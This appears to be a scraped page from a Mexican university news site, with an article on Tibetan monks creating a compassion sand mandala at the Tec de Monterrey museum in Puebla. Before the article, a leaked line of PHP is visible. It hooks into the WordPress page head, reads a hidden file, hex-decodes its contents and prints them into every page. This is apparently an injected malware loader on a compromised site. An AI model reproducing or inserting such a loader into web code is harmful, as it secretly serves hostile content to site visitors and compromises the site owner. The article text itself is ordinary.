if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Museo del Tec será sede de la elaboración del Mándala de la Compasión – La Opinión Universitaria La Opinión Universitaria
Menu

Museo del Tec será sede de la elaboración del Mándala de la Compasión

 

  • Serpa realizado del 15 al 19 de mayo por monjes tibetanos

Por Diego Cuautle

A partir de este día y hasta el próximo 19 de mayo, monjes tibetanos estarán en el Museo del Instituto Tecnológico y de Estudios Superiores de Monterrey (ITESM) Puebla para realizar el “Mándala de la Compasión” una de las expresiones más importantes en el arte de la arena.

La sede que recibirá a los representantes del Tibet estará por varios días en el Centro Histórico de la capital poblana  donde realizarán el mándala de arena, el cual, purifica la mente y otorga bendiciones para el progreso espiritual y material y forma parte de las artes místicas.

Dicho mándala es creado para el bienestar y sanación de los seres vivos y de su entorno. El Mandala de Avalokiteshvara representa la compasión como foco central de la experiencia espiritual.

«Las Artes Místicas del Tíbet» es una gira mundial respaldada por S.S. XIV Dalai Lama, para promover la paz y la sanación universal que por primera vez estará en Puebla y realizará un mandala de arena, realizado por Monjes Tibetanos del Monasterio Drepung Loseling, exiliados y refugiados en la India.

Cabe señalar que el mandala de arena que están preparando estos monjes budistas es un ritual espiritual y simbólico que representa el universo Budista. En segundo plano, el líder espiritual Dalai Lama observa el proceso que en 2014 se llevó a cabo cerca de Leh, en India.

Con grandes dosis de precisión y paciencia, los monjes pasan largas horas preparando el mándala de arena, cuyas líneas deben guiar a los creyentes en su camino hacia la iluminación. Budistas de todas las partes del mundo acuden al lugar escogido durante los casi 10 días que dura la ceremonia.

El ritual empieza solicitando permiso a los espíritus locales para utilizar su casa, posteriormente se realiza la Danza de la Tierra y a continuación una cuerda sumergida en agua con polvo de tiza permite trazar las líneas del mandala, proceso que lleva dos días. Trabajando sin pausa seis jornadas más y mediante el chakpu, un estilizado embudo, los monjes rellenan con arena coloreada el intrincado dibujo.

De acuerdo con el ITESM, el horario al público en general para presenciar tal expresión artística es de las 10 a las 13:30 horas y de las 15 a las 18 horas del 15 al 19 de mayo. El evento es gratuito y el museo está ubicado en la 4 norte número 5 en el centro histórico.

No comments

Deja una respuesta

Tweets recientes